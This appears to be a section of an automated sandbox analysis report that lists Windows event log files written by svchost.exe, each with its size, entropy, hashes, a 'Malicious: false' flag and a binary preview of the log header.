C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8431535491551847
Encrypted:	false
SSDEEP:	384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
MD5:	106F006ACA6287586EF71A10A5C06C4D
SHA1:	B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
SHA-256:	79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
SHA-512:	F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
Malicious:	false
Preview:	ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	105296
Entropy (8bit):	3.76851468404245
Encrypted:	false
SSDEEP:	384:gehXhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRq0:g4bCyhLfIIDAbCyhLfIIDU
MD5:	1AEE33D531D37204F8A7DD5BEA90CED5
SHA1:	1E0AD9F912BFC41440E1E58A5FABF0F5AFEA2E5D
SHA-256:	7C623311A59409CF7F051AF6E173C49BD046FCF983B0D5504657F33877106077
SHA-512:	49B7759F7E4E232AF175A07A0865B849C53B59786D8D3D7B6A4C330C6FF8812C347CFE4CCDC43570C8D41213930EBA70DFCFDFFB13C000102F78302305C38067
Malicious:	false
Preview:	ElfChnk.........K...............K...........H...0.............................................................................{................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**......K...........fg.........Z...{..............................................................<.......T.....!.....................fg..0.U.f.....U.f...........K....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`...2......K.<.....iC.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	113176
Entropy (8bit):	3.7422518246823886
Encrypted:	false
SSDEEP:	768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9HhrpcMhFBuyKskZljdoKXjtT/r18:CMhFBuV3MhFBuVa
MD5:	3DC282FA556AF933F0DBFD782C1994A9
SHA1:	D9C88E555D2AC0EF287560C0B47AFB520FC6C66D
SHA-256:	010A2C2B6C5F6BDCC87965C145DC0108EFD580A67F91ED568AAF774318D244B9
SHA-512:	7DF58DAC6189313CB93C54EBE939702499889F9B1F2C062D33F7B712CDBB2A4AB2C9BED51D4F4B1E47B0B6BDE9425F908136972B888C3D6FC032E6B9553A901E
Malicious:	false
Preview:	ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.895073955959755
Encrypted:	false
SSDEEP:	768:9WgjQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9MUr:qHuO
MD5:	ED84590A35B44C6B30D6E2F9203091E7
SHA1:	6D95D91609E58821C91FC8DAA4A7A69FB7F69C37
SHA-256:	72F1C519496A266DBCE6CB635DEFC46C652E81CBEAB88FA1335707AABF4B00A4
SHA-512:	3E81F73413A16CB6A5298E57F96E760E1EC717BEC11E768E3C9423827353F81162972CFC60B73BECF29D11BA63D46BA38C4AA5032C667862E35EEB101FB0BDD2
Malicious:	false
Preview:	ElfChnk.v.......x.......v.......x...........P...`... .'......................................................................K\u........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......7[..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 25, DIRTY
Category:	dropped
Size (bytes):	92008
Entropy (8bit):	2.6818774465927118
Encrypted:	false
SSDEEP:	384:gah1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzM:3MAP1Qa5AgfQQzygMAP1Qa5AgfQQzy
MD5:	E2E1F63F2CD675CC5BC04EFE2C675D67
SHA1:	77D9517D49EF0D5402B1E4B54547D8DC1F20AB5A
SHA-256:	2AA6AFC6514FE4BF542D33909CAEB14EE2C34E3CEC9F106F6336BEBD1666D520
SHA-512:	49AA46105A855CD8394945130A95A4255A0EAE3C4A48AA971EA958CDE927C0F17438420661DDA109E2194CA5988D73B7C60062D16C69DD93F26BD18DBCF9BBC4
Malicious:	false
Preview:	ElfFile........................................................................................................................WElfChnk......................................c...f..VD+.....................................................................njS.................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.441017411582523
Encrypted:	false
SSDEEP:	384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
MD5:	8D30244BF7119CFA2F8A7A5AF8FCDAB7
SHA1:	F0827675265E0DF98A4967D8A539D476551DCAA6
SHA-256:	489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
SHA-512:	C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
Malicious:	false
Preview:	ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U..&....$..........."..............=1......*......q........\|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2803522685445374
Encrypted:	false
SSDEEP:	384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
MD5:	4A70DB2946C129829BEDDB2E147FBE04
SHA1:	4D3255FABE0E857840591072D9370047FDDFB83A
SHA-256:	C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
SHA-512:	7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
Malicious:	false
Preview:	ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.445920452673848
Encrypted:	false
SSDEEP:	384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
MD5:	21B26F726BBEBA7FD5C4C45386FC544F
SHA1:	F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
SHA-256:	63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
SHA-512:	A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
Malicious:	false
Preview:	ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1562721664799103
Encrypted:	false
SSDEEP:	384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
MD5:	B2C3D7448B237C268D23FE1A78777AA5
SHA1:	6C3A39325392F2B088C00CDC1763268F15832447
SHA-256:	05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
SHA-512:	F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
Malicious:	false
Preview:	ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9195298486885948
Encrypted:	false
SSDEEP:	384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
MD5:	D4A00CC59E964B7DFD6EFDB643322E9E
SHA1:	7307AF862B22D743BF6B531829DABE041E9F1F92
SHA-256:	49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
SHA-512:	51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 418, DIRTY
Category:	dropped
Size (bytes):	40400
Entropy (8bit):	5.676536752030033
Encrypted:	false
SSDEEP:	384:fphKa5SzuzNz0zxzuewKWMKFza5rta5ya5e69a5nla5f2KnzyzIzka50b+a5Ba5U:hfSik7eQwmJlY7bc
MD5:	22B4475F2119BE9BD782B7FBC93DA1C2
SHA1:	902F0278430E8494FBCFE16736D777D9A1DD6FEC
SHA-256:	0969AE994404D3D7067FC501B0BEBB17773A81DC27F57D6927CFE7A21D9F6046
SHA-512:	B1DA3B8B75C5C1DF13B16F2CE450FF69A489E99997D06C9E533F3B3DC3C0573FFF5810CBE21EA6292CFB7FA0AE9A2D5C430B65D1107AF331F250BB1A17EAA8C7
Malicious:	false
Preview:	ElfFile......................................................................................................................?I.ElfChnk.....................................h...P....G!........................................................................{........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................V...........................1...{!......**...............O..e.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.119748237037944
Encrypted:	false
SSDEEP:	384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
MD5:	D1CFC256BC075DC75D7FD92207C9C0F2
SHA1:	587C19CF65305AD470E82AB5A1ED5B2E36472625
SHA-256:	6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
SHA-512:	85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
Malicious:	false
Preview:	ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.182756017330751
Encrypted:	false
SSDEEP:	384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
MD5:	9BA8F6B60705B6A27084436D1D4370AD
SHA1:	DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
SHA-256:	580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
SHA-512:	BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
Malicious:	false
Preview:	ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77088
Entropy (8bit):	3.2911107669337167
Encrypted:	false
SSDEEP:	384:GeIjTCIWIoI8IVImIKIYGIxbI/OsITpIdI0ILI8IPIR1I7IrIl3hDIEQAGxIHIFc:GDe3ZxGe6dh
MD5:	E7B526DB58EEBF8318C7A03920EEA7A6
SHA1:	6788BA39170EE5BA5FBEC88C60C8988651FBF6F2
SHA-256:	AA7A800724E53D1B0EC3F76F2CD7A81F2122398FB89CFAC611F2CFAB7BDEC205
SHA-512:	002C83B06431882580D01A143EB953102BA00BA6CCC367D022CB646F1F8B7869A5A15D202E7C262BA5B94AB4B1ABE448D734EC5AEE448BF9C056A93601FD0575
Malicious:	false
Preview:	ElfChnk.T...............T............................>.................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......x...........fg.........Z...V..............................................................,.......D.....!........... ....@....fg..0.U.f.....U.f...........x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l...........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.800476718060657
Encrypted:	false
SSDEEP:	384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
MD5:	F25E3A5940E51F9A49AC271DE377E2C1
SHA1:	38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
SHA-256:	D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
SHA-512:	CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
Malicious:	false
Preview:	ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.999140584854273
Encrypted:	false
SSDEEP:	768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
MD5:	5234109523F4243D8DFEEAFD9202BC60
SHA1:	49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
SHA-256:	D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
SHA-512:	C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
Malicious:	false
Preview:	ElfChnk.....................................(...8...\|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.419925107849231
Encrypted:	false
SSDEEP:	384:UhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3KB:UIgpCnz/Gh4wRub4r4p6YFv
MD5:	57A513DE874B48BD17EBCDE7C461928E
SHA1:	6F8FEE2AE4680B3ECB4B1FEDE787D2D5B840B42D
SHA-256:	F22FCDEB152790BEC05CA669AF249103061B5760D232C6DCCB6845DF596D0D96
SHA-512:	676C234B72F5A43FE02A3E220C591A03CF870E86AA9FA062CD4D8C6D1FCE81A096A89EB9F8F305E9C1A8CC075C8FCC2EF924B5330568B5ECAF8D48957D2AAC9D
Malicious:	false
Preview:	ElfChnk.........[...............[...............H...xQ.........................................................................................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.760021633915647
Encrypted:	false
SSDEEP:	384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
MD5:	91415CB1A68CB19DCDB017402AAEB51E
SHA1:	EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
SHA-256:	EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
SHA-512:	C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
Malicious:	false
Preview:	ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.764192001733737
Encrypted:	false
SSDEEP:	1536:1XhhUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:1XXnS
MD5:	0ED96BE20298C8DEF888FF2A082442D4
SHA1:	E2D9A51C33EDF8F2F6E2DA34F1C0B70FECA15230
SHA-256:	53C1590B02F63FCC3A52FC0B236BEA6521DA853A90DD50C3CAD4E0CE5DD58566
SHA-512:	DCC7C59B5EFBD6C4D23A40067618EA0DB08BE5F60C1615B79BE1F733E993DCDA60C2E552BA033E16FFF157F702E9C1C0BA92FE006EA676A0443949B274851BF1
Malicious:	false
Preview:	ElfChnk.........'...............'............I...J..j.........................................................................&.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

